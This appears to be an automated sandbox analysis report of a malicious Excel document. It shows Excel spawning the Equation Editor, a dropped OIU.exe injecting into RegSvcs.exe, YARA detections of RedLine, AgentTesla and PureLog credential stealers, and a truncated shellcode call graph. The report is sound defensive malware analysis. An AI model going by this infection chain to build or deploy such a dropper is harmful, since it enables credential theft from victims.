                                                                    2024-05-02 02:59:53 UTC1255INData Raw: 61 63 6b 20 3d 20 66 75 6e 63 74 69 6f 6e 28 72 65 73 70 6f 6e 73 65 29 20 7b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 42 79 49 64 28 27 63 61 70 74 63 68 61 2d 66 6f 72 6d 27 29 2e 73 75 62 6d 69 74 28 29 3b 7d 3b 3c 2f 73 63 72 69 70 74 3e 0a 3c 64 69 76 20 69 64 3d 22 72 65 63 61 70 74 63 68 61 22 20 63 6c 61 73 73 3d 22 67 2d 72 65 63 61 70 74 63 68 61 22 20 64 61 74 61 2d 73 69 74 65 6b 65 79 3d 22 36 4c 66 77 75 79 55 54 41 41 41 41 41 4f 41 6d 6f 53 30 66 64 71 69 6a 43 32 50 62 62 64 48 34 6b 6a 71 36 32 59 31 62 22 20 64 61 74 61 2d 63 61 6c 6c 62 61 63 6b 3d 22 73 75 62 6d 69 74 43 61 6c 6c 62 61 63 6b 22 20 64 61 74 61 2d 73 3d 22 43 6b 31 73 76 64 37 53 76 42 45 4f 35 42 7a 68 79 64 33 49 73 55 79 66 49 6f 76 67 6f 41 6f 46 39
                                                                    Data Ascii: ack = function(response) {document.getElementById('captcha-form').submit();};</script><div id="recaptcha" class="g-recaptcha" data-sitekey="6LfwuyUTAAAAAOAmoS0fdqijC2PbbdH4kjq62Y1b" data-callback="submitCallback" data-s="Ck1svd7SvBEO5Bzhyd3IsUyfIovgoAoF9
                                                                    2024-05-02 02:59:53 UTC959INData Raw: 6f 67 6c 65 20 61 75 74 6f 6d 61 74 69 63 61 6c 6c 79 20 64 65 74 65 63 74 73 20 72 65 71 75 65 73 74 73 20 63 6f 6d 69 6e 67 20 66 72 6f 6d 20 79 6f 75 72 20 63 6f 6d 70 75 74 65 72 20 6e 65 74 77 6f 72 6b 20 77 68 69 63 68 20 61 70 70 65 61 72 20 74 6f 20 62 65 20 69 6e 20 76 69 6f 6c 61 74 69 6f 6e 20 6f 66 20 74 68 65 20 3c 61 20 68 72 65 66 3d 22 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 2e 63 6f 6d 2f 70 6f 6c 69 63 69 65 73 2f 74 65 72 6d 73 2f 22 3e 54 65 72 6d 73 20 6f 66 20 53 65 72 76 69 63 65 3c 2f 61 3e 2e 20 54 68 65 20 62 6c 6f 63 6b 20 77 69 6c 6c 20 65 78 70 69 72 65 20 73 68 6f 72 74 6c 79 20 61 66 74 65 72 20 74 68 6f 73 65 20 72 65 71 75 65 73 74 73 20 73 74 6f 70 2e 20 20 49 6e 20 74 68 65 20 6d 65 61 6e 74 69 6d 65 2c 20 73 6f 6c 76 69 6e
                                                                    Data Ascii: ogle automatically detects requests coming from your computer network which appear to be in violation of the <a href="//www.google.com/policies/terms/">Terms of Service</a>. The block will expire shortly after those requests stop. In the meantime, solvin


                                                                    Statistics

                                                                    CPU Usage

                                                                    Click to jump to process

                                                                    Memory Usage

                                                                    Click to jump to process

                                                                    High Level Behavior Distribution

                                                                    Click to dive into process behavior distribution

                                                                    Behavior

                                                                    Click to jump to process

                                                                    System Behavior

                                                                    General

                                                                    Target ID:0
                                                                    Start time:04:58:17
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /automation -Embedding
                                                                    Imagebase:0x13fc00000
                                                                    File size:28'253'536 bytes
                                                                    MD5 hash:D53B85E21886D2AF9815C377537BCAC3
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:2
                                                                    Start time:04:59:06
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE" -Embedding
                                                                    Imagebase:0x400000
                                                                    File size:543'304 bytes
                                                                    MD5 hash:A87236E214F6D42A65F5DEDAC816AEC8
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:high
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:3
                                                                    Start time:04:59:08
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000003.00000002.457795747.0000000000120000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Antivirus matches:
                                                                    • Detection: 100%, Joe Sandbox ML
                                                                    • Detection: 27%, ReversingLabs
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:4
                                                                    Start time:04:59:09
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Imagebase:0x150000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:5
                                                                    Start time:04:59:09
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xea0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000005.00000002.460633124.0000000000DE0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:6
                                                                    Start time:04:59:10
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x860000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:7
                                                                    Start time:04:59:10
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000007.00000002.462329527.00000000006E0000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:8
                                                                    Start time:04:59:11
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xf90000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:9
                                                                    Start time:04:59:11
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 00000009.00000002.464011217.0000000000360000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:10
                                                                    Start time:04:59:12
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x1180000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:11
                                                                    Start time:04:59:12
                                                                    Start date:02/05/2024
                                                                    Path:C:\Users\user\AppData\Roaming\OIU.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0xba0000
                                                                    File size:1'287'680 bytes
                                                                    MD5 hash:158C5C0367C262694F3C44AE85B891B6
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000B.00000002.466866889.0000000000A40000.00000004.00001000.00020000.00000000.sdmp, Author: ditekSHen
                                                                    Reputation:low
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:12
                                                                    Start time:04:59:13
                                                                    Start date:02/05/2024
                                                                    Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegSvcs.exe
                                                                    Wow64 process (32bit):true
                                                                    Commandline:"C:\Users\user\AppData\Roaming\OIU.exe"
                                                                    Imagebase:0x1350000
                                                                    File size:45'248 bytes
                                                                    MD5 hash:19855C0DC5BEC9FDF925307C57F9F5FC
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Yara matches:
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.619916072.0000000000530000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: INDICATOR_SUSPICIOUS_EXE_VaultSchemaGUID, Description: Detects executables referencing Windows vault credential objects. Observed in infostealers, Source: 0000000C.00000002.619859392.0000000000300000.00000004.08000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_RedLine, Description: Yara detected RedLine Stealer, Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: MALWARE_Win_RedLine, Description: Detects RedLine infostealer, Source: 0000000C.00000002.619889469.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Author: ditekSHen
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.619992172.0000000000B2F000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.620104008.0000000002761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    • Rule: JoeSecurity_PureLogStealer, Description: Yara detected PureLog Stealer, Source: 0000000C.00000002.620190248.0000000003761000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:15
                                                                    Start time:04:59:45
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:16
                                                                    Start time:04:59:46
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1432 --field-trial-handle=1256,i,7674118080207217716,3458138178017285583,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x13fa80000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:false

                                                                    General

                                                                    Target ID:18
                                                                    Start time:04:59:51
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --start-maximized --single-argument http:///
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    General

                                                                    Target ID:19
                                                                    Start time:04:59:51
                                                                    Start date:02/05/2024
                                                                    Path:C:\Program Files (x86)\Google\Chrome\Application\chrome.exe
                                                                    Wow64 process (32bit):false
                                                                    Commandline:"C:\Program Files (x86)\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=1440 --field-trial-handle=1200,i,5669568352595894290,4267387126016238941,131072 --disable-features=OptimizationGuideModelDownloading,OptimizationHints,OptimizationHintsFetching,OptimizationTargetPrediction /prefetch:8
                                                                    Imagebase:0x13fca0000
                                                                    File size:3'151'128 bytes
                                                                    MD5 hash:FFA2B8E17F645BCC20F0E0201FEF83ED
                                                                    Has elevated privileges:true
                                                                    Has administrator privileges:true
                                                                    Programmed in:C, C++ or other language
                                                                    Reputation:moderate
                                                                    Has exited:true

                                                                    Disassembly

                                                                    Reset < >

                                                                      Execution Graph

                                                                      Execution Coverage:28.2%
                                                                      Dynamic/Decrypted Code Coverage:0%
                                                                      Signature Coverage:78.1%
                                                                      Total number of Nodes:602
                                                                      Total number of Limit Nodes:3
                                                                      execution_graph 2221 3520582 ExitProcess 2265 352059b 2221->2265 2223 35205f3 2348 352062a 2223->2348 2225 3520689 2231 35206c1 30 API calls 2225->2231 2226 352069a 33 API calls 2226->2225 2227 352063f CreateFileW 2229 3520661 40 API calls 2227->2229 2228 352061d 2228->2225 2228->2227 2232 3520651 2228->2232 2229->2232 2230 352058e 2230->2223 2230->2227 2230->2228 2234 352064a 2230->2234 2235 35205d8 2230->2235 2233 35206a7 2231->2233 2232->2226 2236 35206d4 2233->2236 2237 3520739 2233->2237 2234->2232 2239 3520661 40 API calls 2234->2239 2310 3520617 2235->2310 2238 3520743 2236->2238 2241 3520700 24 API calls 2236->2241 2237->2238 2243 352075a 15 API calls 2237->2243 2242 3520776 12 API calls 2238->2242 2252 352076c 2238->2252 2239->2232 2244 35206ee 2241->2244 2242->2252 2246 352073f 2243->2246 2245 352079a 2244->2245 2249 3520728 2244->2249 2251 35207b4 6 API calls 2245->2251 2246->2238 2246->2245 2246->2252 2247 3520801 2250 3520815 3 API calls 2247->2250 2248 3520771 2257 352075a 15 API calls 2249->2257 2253 3520809 2250->2253 2251->2252 2252->2247 2252->2248 2254 352080e 2252->2254 2256 35207f4 WriteFile 2252->2256 2253->2254 2255 3520873 WinExec 2253->2255 2259 3520836 3 API calls 2254->2259 2258 3520887 ExitProcess 2255->2258 2256->2252 2257->2238 2260 352087b 2258->2260 2261 3520822 2259->2261 2262 352085f 2260->2262 2263 352088a ExitProcess 2260->2263 2261->2262 2264 3520867 3 API calls 2261->2264 2264->2262 2266 35205a1 2265->2266 2386 35205b7 2266->2386 2268 35205f3 2269 352062a 44 API calls 2268->2269 2273 352061d 2269->2273 2270 3520689 2276 35206c1 30 API calls 2270->2276 2271 352069a 33 API calls 2271->2270 2272 352063f CreateFileW 2274 3520661 40 API calls 2272->2274 2273->2270 2273->2272 2277 3520651 2273->2277 2274->2277 2275 35205a8 2275->2268 2275->2272 2275->2273 2279 352064a 2275->2279 2280 35205d8 2275->2280 2278 35206a7 2276->2278 2277->2271 2281 35206d4 2278->2281 2282 3520739 2278->2282 2279->2277 2283 3520661 40 API calls 2279->2283 2284 3520617 48 API calls 2280->2284 2285 3520700 24 API calls 2281->2285 2303 3520743 2281->2303 2288 352075a 15 API calls 2282->2288 2282->2303 2283->2277 2284->2268 2287 35206ee 2285->2287 2286 3520776 12 API calls 2290 352076c 2286->2290 2291 352079a 2287->2291 2294 3520728 2287->2294 2289 352073f 2288->2289 2289->2290 2289->2291 2289->2303 2292 3520801 2290->2292 2293 3520771 2290->2293 2298 352080e 2290->2298 2300 35207f4 WriteFile 2290->2300 2296 35207b4 6 API calls 2291->2296 2295 3520815 3 API calls 2292->2295 2293->2230 2301 352075a 15 API calls 2294->2301 2297 3520809 2295->2297 2296->2290 2297->2298 2299 3520873 WinExec 2297->2299 2304 3520836 3 API calls 2298->2304 2302 3520887 ExitProcess 2299->2302 2300->2290 2301->2303 2305 352087b 2302->2305 2303->2286 2303->2290 2306 3520822 2304->2306 2307 352085f 2305->2307 2308 352088a ExitProcess 2305->2308 2306->2307 2309 3520867 3 API calls 2306->2309 2307->2230 2309->2307 2311 3520619 2310->2311 2312 352062a 44 API calls 2311->2312 2313 352061e 2312->2313 2314 3520689 2313->2314 2316 352063f CreateFileW 2313->2316 2319 3520651 2313->2319 2318 35206c1 30 API calls 2314->2318 2315 352069a 33 API calls 2315->2314 2317 3520661 40 API calls 2316->2317 2317->2319 2320 35206a7 2318->2320 2319->2315 2321 35206d4 2320->2321 2322 3520739 2320->2322 2323 3520700 24 API calls 2321->2323 2341 3520743 2321->2341 2326 352075a 15 API calls 2322->2326 2322->2341 2325 35206ee 2323->2325 2324 3520776 12 API calls 2328 352076c 2324->2328 2329 352079a 2325->2329 2332 3520728 2325->2332 2327 352073f 2326->2327 2327->2328 2327->2329 2327->2341 2330 3520801 2328->2330 2331 3520771 2328->2331 2336 352080e 2328->2336 2338 35207f4 WriteFile 2328->2338 2334 35207b4 6 API calls 2329->2334 2333 3520815 3 API calls 2330->2333 2331->2223 2339 352075a 15 API calls 2332->2339 2335 3520809 2333->2335 2334->2328 2335->2336 2337 3520873 WinExec 2335->2337 2342 3520836 3 API calls 2336->2342 2340 3520887 ExitProcess 2337->2340 2338->2328 2339->2341 2343 352087b 2340->2343 2341->2324 2341->2328 2344 3520822 2342->2344 2345 352085f 2343->2345 2346 352088a ExitProcess 2343->2346 2344->2345 2347 3520867 3 API calls 2344->2347 2345->2223 2347->2345 2349 352062d CreateFileW 2348->2349 2351 3520661 40 API calls 2349->2351 2352 3520651 2351->2352 2353 352069a 33 API calls 2352->2353 2354 3520689 2353->2354 2355 35206c1 30 API calls 2354->2355 2356 35206a7 2355->2356 2357 35206d4 2356->2357 2358 3520739 2356->2358 2359 3520700 24 API calls 2357->2359 2377 3520743 2357->2377 2362 352075a 15 API calls 2358->2362 2358->2377 2361 35206ee 2359->2361 2360 3520776 12 API calls 2364 352076c 2360->2364 2365 352079a 2361->2365 2368 3520728 2361->2368 2363 352073f 2362->2363 2363->2364 2363->2365 2363->2377 2366 3520801 2364->2366 2367 3520771 2364->2367 2372 352080e 2364->2372 2374 35207f4 WriteFile 2364->2374 2370 35207b4 6 API calls 2365->2370 2369 3520815 3 API calls 2366->2369 2367->2228 2375 352075a 15 API calls 2368->2375 2371 3520809 2369->2371 2370->2364 2371->2372 2373 3520873 WinExec 2371->2373 2378 3520836 3 API calls 2372->2378 2376 3520887 ExitProcess 2373->2376 2374->2364 2375->2377 2380 352087b 2376->2380 2377->2360 2377->2364 2379 3520822 2378->2379 2381 3520834 2379->2381 2382 352089a 2379->2382 2380->2382 2383 352088a ExitProcess 2380->2383 2384 3520867 3 API calls 2381->2384 2382->2228 2385 352085f 2384->2385 2385->2382 2387 35205bd 2386->2387 2431 35205de 2387->2431 2389 35205c4 2390 352063f CreateFileW 2389->2390 2392 352064a 2389->2392 2393 35205d8 2389->2393 2391 3520661 40 API calls 2390->2391 2396 3520651 2391->2396 2394 3520661 40 API calls 2392->2394 2392->2396 2395 3520617 48 API calls 2393->2395 2394->2396 2399 35205f3 2395->2399 2397 352069a 33 API calls 2396->2397 2398 3520689 2397->2398 2401 35206c1 30 API calls 2398->2401 2400 352062a 44 API calls 2399->2400 2402 352061e 2400->2402 2403 35206a7 2401->2403 2402->2390 2402->2396 2402->2398 2404 35206d4 2403->2404 2405 3520739 2403->2405 2406 3520700 24 API calls 2404->2406 2424 3520743 2404->2424 2409 352075a 15 API calls 2405->2409 2405->2424 2408 35206ee 2406->2408 2407 3520776 12 API calls 2411 352076c 2407->2411 2412 352079a 2408->2412 2415 3520728 2408->2415 2410 352073f 2409->2410 2410->2411 2410->2412 2410->2424 2413 3520801 2411->2413 2414 3520771 2411->2414 2419 352080e 2411->2419 2421 35207f4 WriteFile 2411->2421 2417 35207b4 6 API calls 2412->2417 2416 3520815 3 API calls 2413->2416 2414->2275 2422 352075a 15 API calls 2415->2422 2418 3520809 2416->2418 2417->2411 2418->2419 2420 3520873 WinExec 2418->2420 2425 3520836 3 API calls 2419->2425 2423 3520887 ExitProcess 2420->2423 2421->2411 2422->2424 2426 352087b 2423->2426 2424->2407 2424->2411 2427 3520822 2425->2427 2428 352085f 2426->2428 2429 352088a ExitProcess 2426->2429 2427->2428 2430 3520867 3 API calls 2427->2430 2428->2275 2430->2428 2432 35205e1 2431->2432 2433 3520617 48 API calls 2432->2433 2434 35205f3 2433->2434 2435 352062a 44 API calls 2434->2435 2436 352061e 2435->2436 2437 3520689 2436->2437 2439 352063f CreateFileW 2436->2439 2442 3520651 2436->2442 2441 35206c1 30 API calls 2437->2441 2438 352069a 33 API calls 2438->2437 2440 3520661 40 API calls 2439->2440 2440->2442 2443 35206a7 2441->2443 2442->2438 2444 35206d4 2443->2444 2445 3520739 2443->2445 2446 3520700 24 API calls 2444->2446 2464 3520743 2444->2464 2449 352075a 15 API calls 2445->2449 2445->2464 2448 35206ee 2446->2448 2447 3520776 12 API calls 2451 352076c 2447->2451 2452 352079a 2448->2452 2455 3520728 2448->2455 2450 352073f 2449->2450 2450->2451 2450->2452 2450->2464 2453 3520801 2451->2453 2454 3520771 2451->2454 2459 352080e 2451->2459 2461 35207f4 WriteFile 2451->2461 2457 35207b4 6 API calls 2452->2457 2456 3520815 3 API calls 2453->2456 2454->2389 2462 352075a 15 API calls 2455->2462 2458 3520809 2456->2458 2457->2451 2458->2459 2460 3520873 WinExec 2458->2460 2465 3520836 3 API calls 2459->2465 2463 3520887 ExitProcess 2460->2463 2461->2451 2462->2464 2466 352087b 2463->2466 2464->2447 2464->2451 2467 3520822 2465->2467 2468 352085f 2466->2468 2469 352088a ExitProcess 2466->2469 2467->2468 2470 3520867 3 API calls 2467->2470 2468->2389 2470->2468 1844 352062a 1845 352062d CreateFileW 1844->1845 1882 3520661 LoadLibraryW 1845->1882 1848 3520651 1918 352069a 1848->1918 1850 3520689 1951 35206c1 1850->1951 1852 35206a7 1853 35206d4 1852->1853 1854 3520739 1852->1854 1873 3520743 1853->1873 1984 3520700 1853->1984 1854->1873 2010 352075a 1854->2010 1857 35206ee 1861 352079a 1857->1861 1864 3520728 1857->1864 1859 352073f 1860 352076c 1859->1860 1859->1861 1859->1873 1862 3520801 1860->1862 1863 3520771 1860->1863 1868 352080e 1860->1868 1870 35207f4 WriteFile 1860->1870 2061 35207b4 1861->2061 2030 3520815 1862->2030 1871 352075a 15 API calls 1864->1871 1867 3520809 1867->1868 1869 3520873 WinExec 1867->1869 2078 3520836 1868->2078 2038 3520887 1869->2038 1870->1860 1871->1873 1873->1860 2040 3520776 1873->2040 1875 3520822 1877 3520834 1875->1877 1878 352089a 1875->1878 1876 352087b 1876->1878 1879 352088a ExitProcess 1876->1879 2082 3520867 1877->2082 2089 3520676 1882->2089 1884 35206d4 1886 3520700 24 API calls 1884->1886 1889 3520743 1884->1889 1885 352066a 1885->1884 1888 352069a 33 API calls 1885->1888 1887 35206ee 1886->1887 1891 352079a 1887->1891 1893 3520728 1887->1893 1890 3520689 1888->1890 1896 3520776 12 API calls 1889->1896 1906 352076c 1889->1906 1894 35206c1 30 API calls 1890->1894 1899 35207b4 6 API calls 1891->1899 1892 3520801 1895 3520815 3 API calls 1892->1895 1903 352075a 15 API calls 1893->1903 1897 35206a7 1894->1897 1898 3520809 1895->1898 1896->1906 1897->1884 1900 3520739 1897->1900 1901 3520873 WinExec 1898->1901 1902 352080e 1898->1902 1899->1906 1900->1889 1909 352075a 15 API calls 1900->1909 1904 3520887 ExitProcess 1901->1904 1908 3520836 3 API calls 1902->1908 1903->1889 1912 352087b 1904->1912 1905 3520771 1905->1848 1906->1892 1906->1902 1906->1905 1907 35207f4 WriteFile 1906->1907 1907->1906 1910 3520822 1908->1910 1911 352073f 1909->1911 1913 3520834 1910->1913 1914 352089a 